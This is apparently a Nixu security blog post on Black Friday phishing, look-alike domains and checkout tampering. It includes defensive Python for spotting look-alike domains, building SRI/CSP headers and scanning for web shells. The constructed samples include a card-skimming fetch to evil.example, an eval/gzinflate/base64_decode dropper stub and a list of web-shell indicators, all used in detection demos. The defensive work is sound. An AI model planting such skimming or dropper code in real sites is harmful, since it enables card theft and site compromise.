Black Friday has turned into an entire Black Week, followed closely by Cyber Monday, and the online shopping frenzy continues until Christmas. For many retailers, this is the time for making big profits. Unfortunately, Cyber Monday does not stand for cybersecurity, so cybercriminals are also on the move, looking for money, credit card numbers, credentials, and personal data to be used in identity theft. For example, Check Point reported that the number of phishing emails has already doubled this November to hook incautious online shoppers with fake Black Friday and Cyber Monday deals. Read our tips on how to protect your customers and your company.
Spam, malware, fake sites, and phishing
As many businesses are reminding their customers about their best bargains with marketing emails, it is easy for cybercriminals to blend in with fraudulent emails of their own. The malicious messages may be crafted to look like those sent by popular brands, or they advertise huge discounts if the recipient just reacts within 24 hours. Instead of getting the best deal of the year, your customers might end up opening malware attached to the email.
Users clicking on the messages might also land on a look-alike website imitating a popular brand. Even the domain name can be misleading: it is difficult to spot tiny differences such as an extra hyphen, .net instead of .com, or characters that look the same at a quick glance. Using legitimate-looking long domain names like black-friday-offers-company.com or refund-support-company.org is another trick. The purpose of these sites is typically to phish account credentials and credit card details. An unwary user might also get caught in a subscription trap and find themselves locked into recurring payments.
The hoax might also come as a password reset email, or as a failed-delivery notification asking you to enter your credit card number to pay a missing delivery fee.
As a company: what to do?
- Keep your marketing messages consistent so customers can recognize what they typically look like, what kind of language you use, and which addresses you send them from.
- Notify your customers about any known scams, for example on your website's front page. Note that some of the phishing sites may also be targeted at your employees, so notify them too.
- Make it easy for people to report new fake emails or sites using your brand to you. For example, set up a dedicated email address such as email@example.com, or add a separate category to your website feedback form.
- Report phishing sites to your country’s national CERT, so they can coordinate site takedown with internet service providers.
- Consider using a threat intelligence service that provides look-alike domain monitoring and other information about possible phishing attempts against your company, as well as fake employee profiles.
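The domain tricks described above (an extra hyphen, a swapped TLD, characters that look the same, and long names that embed your brand) can be checked mechanically against any feed of newly seen domains, such as certificate transparency logs or new registrations. The following is an added example written for this post, not code from Nixu or from any threat intelligence product; the brand name `company`, the list of legitimate TLDs and the `OBSERVED` feed are constructed for illustration. It reduces each domain to a "skeleton" of what the eye reads and then explains how the skeleton relates to the brand.

```python
import unicodedata

BRAND = "company"             # constructed: the brand label you want to protect
LEGIT_TLDS = {"com"}          # constructed: the TLDs you actually register the brand in

# Characters that look like ASCII letters at a glance. The non-ASCII ones are
# Cyrillic letters that IDN registrations allow; "rn" is the classic "m" look-alike.
CONFUSABLES = {
    "0": "o", "\u043e": "o",                        # digit zero, Cyrillic о
    "1": "l",                                       # digit one
    "\u0430": "a", "\u0435": "e", "\u0441": "c",    # Cyrillic а е с
    "\u0440": "p", "\u0455": "s", "\u0443": "y",    # Cyrillic р ѕ у
    "\u0456": "i",                                  # Cyrillic і
}


def to_unicode(domain: str) -> str:
    """Decode punycode labels (xn--...) so homoglyphs are compared as real characters."""
    try:
        return domain.encode("ascii").decode("idna")
    except UnicodeError:
        return domain        # already Unicode (or not valid IDNA): compare as given


def skeleton(label: str) -> str:
    """Collapse a label to what the eye reads: lowercase, NFKC, confusables mapped to ASCII."""
    s = unicodedata.normalize("NFKC", label.lower()).replace("rn", "m")
    return "".join(CONFUSABLES.get(ch, ch) for ch in s)


def classify(domain: str, brand: str = BRAND, legit_tlds=LEGIT_TLDS) -> str:
    """Explain how a domain relates to the brand. Simplification: the last label is
    treated as the TLD, so multi-part suffixes such as co.uk need a public-suffix list."""
    domain = to_unicode(domain.strip().rstrip(".").lower())
    rest, _, tld = domain.rpartition(".")
    label = rest.split(".")[-1]          # registrable label; subdomains are ignored
    sk = skeleton(label)
    if label == brand:
        return "legitimate" if tld in legit_tlds else f"tld-swap: .{tld}"
    if sk == brand:
        return "homoglyph"               # reads as the brand but is spelled differently
    if sk.replace("-", "") == brand:
        return "hyphen-insertion"
    if brand in sk.split("-"):
        return "brand-embedded"          # e.g. black-friday-offers-company.com
    return "unrelated"


# Constructed feed: what a certificate-transparency or new-registration watch might show.
OBSERVED = [
    "company.com", "shop.company.com", "company.net", "c0mpany.com",
    "c\u043empany.com", "cornpany.com", "com-pany.com",
    "black-friday-offers-company.com", "refund-support-company.org", "example.org",
]


def find_lookalikes(domains=OBSERVED):
    """Return only the domains that warrant a takedown request or a warning to customers."""
    return {d: classify(d) for d in domains
            if classify(d) not in ("legitimate", "unrelated")}


if __name__ == "__main__":
    for domain, verdict in find_lookalikes().items():
        print(f"{domain:40} {verdict}")
```

The skeleton approach deliberately over-matches: a legitimate third party whose name happens to contain your brand will also be flagged. That is the right trade-off for a monitoring feed, where a human reviews the hits before a takedown request goes to the CERT or registrar.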
Data breaches and fake payment sites
Even if you use an external payment service provider, attackers who gain access to your site might modify your checkout page so that it redirects the customer to a fake payment site instead.
Both these attacks can be difficult to spot, especially by the customer.
As a company: what to do?
- Install security updates for the server operating system, the e-commerce platform, and the other components used by the site regularly. Install critical updates as soon as possible.
- Conduct security assessments and vulnerability scanning, or use bug bounties, to get a regular picture of your website's security status so you can keep it at a proper level. Read more tips from my previous blog, Are your IT systems secure? Five ways to check and improve the state of your information security. Use security monitoring to detect cyberattack attempts.
- Use multi-factor authentication for administrative functionality.
- Make sure your online shopping site is privacy-friendly and not a haven for identity theft. Collect only the minimum information you need to fulfil orders and maintain customer relations, clearly state what the data is used for, make it easy to opt out, and protect the storage and handling of personal data.
A few extra tips for the website admins:
- If possible, host copies of third-party scripts yourself instead of loading them from the third party's servers, so that a change on their side (or on the side of whoever compromises them) cannot alter what your customers execute.
- Use Subresource Integrity (SRI) so that browsers execute only script versions whose hash matches the copy you have reviewed; if the script changes, the browser refuses to run it.
- Use Content Security Policy (CSP) to allow scripts only from specific sources.
- Monitor changes in the 3rd party scripts you use and review the changes.
- When you're introducing new 3rd party plugins, libraries or components, review how well the component is maintained (are there release notes available, how often are changes made, any mentions about security, etc.), and whether the distribution source or developer seems legitimate. If hardly anyone uses the plugin or you're suddenly getting paid features for free, it might be fake.
- Monitor your website's filesystem for changes. If new .js, .php, or .html files suddenly appear that use base64_decode, eval, preg_replace, substr, gzinflate, or similar functions, they may be a web shell or other injected malicious code, such as an exploit kit loader. Grepping for these regularly is a good idea. Another symptom is base64-encoded data blobs inside these files. Check more tips on detecting suspicious activity in my previous blog.
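The SRI and CSP tips above, and the fake payment site redirect described in the previous section, can be put together in a few lines. The following is an added example written for this post, not code from Nixu or from any e-commerce platform; the widget body, the hosts `cdn.example` and `pay.example` and the tampered copy are constructed. It computes the `integrity` value for a reviewed script, detects when a freshly fetched copy no longer matches (the change monitoring tip), and builds a CSP whose `form-action` directive stops an injected checkout form from posting card details anywhere but your own origin and your payment service provider.

```python
import base64
import hashlib


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return the SRI integrity value for a script body: '<algo>-<base64 digest>'."""
    if algo not in ("sha256", "sha384", "sha512"):
        raise ValueError("SRI allows only sha256, sha384 or sha512")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes) -> str:
    """Emit the <script> tag for a reviewed copy. crossorigin is required for
    cross-origin SRI, and the CDN must answer with CORS headers or the load fails."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


def script_changed(expected: str, content: bytes) -> bool:
    """True if a freshly fetched copy no longer matches the reviewed hash.
    Run this from a monitoring job so you learn about a change before customers do."""
    algo = expected.split("-", 1)[0]
    return sri_hash(content, algo) != expected


def build_csp(script_hosts, form_hosts) -> str:
    """Build a Content-Security-Policy value that confines scripts to reviewed hosts
    and form submissions to your own origin plus your payment service provider."""
    directives = {
        "default-src": ["'self'"],
        "script-src": ["'self'", *script_hosts],
        "form-action": ["'self'", *form_hosts],   # blocks posting to a fake payment site
        "object-src": ["'none'"],
        "base-uri": ["'self'"],
    }
    return "; ".join(f"{name} {' '.join(values)}" for name, values in directives.items())


# Constructed sample: the reviewed copy of a third-party widget, then a changed copy
# that would try to exfiltrate a card number from the checkout form.
REVIEWED = b"window.widget = function () { return 'ok'; };\n"
TAMPERED = REVIEWED + (b"fetch('https://evil.example/c?d=' + "
                       b"document.querySelector('#card').value);\n")


def demo():
    """Return (integrity value, whether the tampered copy is rejected, CSP header)."""
    expected = sri_hash(REVIEWED)
    return expected, script_changed(expected, TAMPERED), build_csp(
        ["https://cdn.example"], ["https://pay.example"])


if __name__ == "__main__":
    expected, rejected, csp = demo()
    print(script_tag("https://cdn.example/widget.js", REVIEWED))
    print("tampered copy rejected:", rejected)
    print("Content-Security-Policy:", csp)
```

Two caveats a practitioner should keep in mind. SRI fails closed: when the provider ships a legitimate update, the widget stops loading until you review the new version and update the hash, which is exactly why the change monitoring belongs in a scheduled job. And both SRI and CSP protect against altered third-party content; if attackers control your own server they can rewrite the CSP header along with the checkout page, which is what the patching, MFA and filesystem monitoring tips are for.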
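The filesystem monitoring tip above is more useful as a baseline comparison than as a bare grep, because a healthy PHP site legitimately calls substr and base64_decode in many places. The following is an added example written for this post, not code from Nixu or from any e-commerce platform: it records a snapshot of file hashes when the site is known-good, later reports files that are new or modified, and grades each one by the combination of indicators it contains. The file names, paths and file contents in `demo()` are constructed; the thresholds are a heuristic, not a definitive malware test.

```python
import hashlib
import os
import re
import tempfile

# Indicators from the tip above plus a few common companions. Each one alone is
# ordinary PHP; a decoder feeding an executor, or a long encoded blob, is not.
INDICATORS = {
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "eval": re.compile(r"\beval\s*\("),
    "gzinflate/gzuncompress": re.compile(r"\bgz(inflate|uncompress)\s*\("),
    "str_rot13": re.compile(r"\bstr_rot13\s*\("),
    # preg_replace with the /e modifier evaluates the replacement as PHP code
    "preg_replace /e": re.compile(r"""preg_replace\s*\(\s*['"][^'"]*/[a-zA-Z]*e[a-zA-Z]*['"]"""),
    "substr": re.compile(r"\bsubstr\s*\("),
    "base64-blob": re.compile(r"[A-Za-z0-9+/]{120,}={0,2}"),
}
SCAN_EXT = (".php", ".phtml", ".js", ".html", ".htm")


def indicators(text: str):
    """Names of the indicators present in a file's text, in INDICATORS order."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def is_suspicious(hits) -> bool:
    """Decoder plus executor together, or an encoded blob, is the classic injected-code shape."""
    decoders = {"base64_decode", "gzinflate/gzuncompress", "str_rot13"}
    executors = {"eval", "preg_replace /e"}
    hits = set(hits)
    return "base64-blob" in hits or bool(decoders & hits and executors & hits)


def file_hash(path: str) -> str:
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()


def snapshot(root: str):
    """Map each scannable file (path relative to root) to its sha256.
    Store the result somewhere the web server cannot write to."""
    snap = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(SCAN_EXT):
                full = os.path.join(dirpath, name)
                snap[os.path.relpath(full, root)] = file_hash(full)
    return snap


def scan(root: str, baseline):
    """List (path, status, indicator hits, suspicious) for files new or changed since the baseline."""
    report = []
    for rel, digest in snapshot(root).items():
        if rel not in baseline:
            status = "new"
        elif baseline[rel] != digest:
            status = "modified"
        else:
            continue
        with open(os.path.join(root, rel), encoding="utf-8", errors="replace") as f:
            hits = indicators(f.read())
        report.append((rel, status, hits, is_suspicious(hits)))
    return report


def demo():
    """Constructed scenario: a clean site, then a dropped web shell and an injected blob."""
    with tempfile.TemporaryDirectory() as root:
        theme_dir = os.path.join(root, "wp-content", "themes")
        os.makedirs(theme_dir)
        with open(os.path.join(root, "index.php"), "w") as f:
            f.write("<?php echo substr($title, 0, 40); ?>")        # benign substr use
        footer = os.path.join(theme_dir, "footer.php")
        with open(footer, "w") as f:
            f.write("<?php echo date('Y'); ?>")
        baseline = snapshot(root)                                    # known-good state
        # Attacker activity (constructed): obfuscated dropper and an injected blob
        with open(os.path.join(root, "wp-content", "cache.php"), "w") as f:
            f.write("<?php eval(gzinflate(base64_decode('H4sIAAAAAAAA'))); ?>")
        with open(footer, "a") as f:
            f.write("<script>" + "A" * 200 + "==</script>")
        return sorted(scan(root, baseline))


if __name__ == "__main__":
    for rel, status, hits, suspicious in demo():
        print(f"{status:9} {rel:35} {'SUSPICIOUS' if suspicious else 'review'} {hits}")
```

The unchanged index.php never appears in the report even though it calls substr, which is the point of the baseline: you review what changed, and the indicator list tells you where to look first. Rotate the baseline after every deployment you performed yourself.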
Want to keep track of what's happening in cybersecurity? Sign up for Nixu Newsletter.